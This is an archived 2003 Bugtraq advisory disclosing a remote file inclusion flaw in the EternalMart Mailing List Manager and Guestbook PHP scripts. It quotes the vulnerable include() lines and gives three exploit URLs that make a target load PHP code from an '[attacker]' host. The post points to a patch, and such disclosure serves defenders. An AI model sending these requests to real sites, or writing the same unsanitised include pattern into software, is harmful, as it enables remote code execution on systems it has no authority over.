SecurityFocus BUGTRAQ Mailing List: BugTraqLink Number One Link Number One Link Number Two Link Number Two Link Number One Link Number One Link Number Two Link Number Two Entire Site Advisories Calendar Columnists Elsewhere Guest Feature Infocus Library Links Mailing Lists (all) -- BUGTRAQ -- FOCUS-IDS -- FOCUS-IH -- FOCUS-LINUX -- FOCUS-MS -- FOCUS-SUN -- FOCUS-VIRUS -- FORENSICS -- INCIDENTS -- PEN-TEST -- SEC JOBS -- SF NEWS -- VULN-DEV News Products Services Tools Vulns BUGTRAQ ARCHIVE [ Message Index ] [ Thread Index ][ Reply ] [ prev Msg by Date ][ next Msg by Date ] To: BugTraq Subject: EMML, EMGB : Include() hole Date: Oct 4 2003 2:39PM Author: Frog Man Message-ID: Informations : °°°°°°°°°°°°° Language : PHP ------------------------------------------------- Produit : EMML (EternalMart Mailing List Manager) Version : 1.32 ------------------------------------------------- Produit : EMGB (EternalMart Guestbook) Version : 1.1 ------------------------------------------------- Website : http://www.eternalmart.com Problem : Include Files PHP Code/Location : °°°°°°°°°°°°°°°°°°° EMML : email_email_func.php : -------------------------------------------------- include("$emml_path/class.html.mime.mail.php"); -------------------------------------------------- /admin/auth.php : -------------------------------------------- include("$emml_admin_path/auth_func.php"); -------------------------------------------- EMGB : /admin/auth.php : -------------------------------------------- include("$emgb_admin_path/auth_func.php"); -------------------------------------------- Exploits : °°°°°°°° EMML : - http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php - http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php EMGB : - http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php More Details/Solution : °°°°°°°°°°°°°°°°°°°°° A patch and more details can be found on http://www.phpsecure.info . frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail Want to link to this message? Use this URL: Disclaimer, Terms & Conditions About this List Featured Lists: ARIS Users bugtraq bugtraq-es bugtraq-french NEW bugtraq-jp firewalls focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics forensics-es honeypots incidents libnet pen-test secevents secpapers secprog sectools secureshell security-basics security-management NEW securityjobs vpn vuln-dev webappsec Newsletters: sf-news ms-secnews linux-secnews [ more . . . ] Privacy Statement Copyright © 1999-2003 SecurityFocus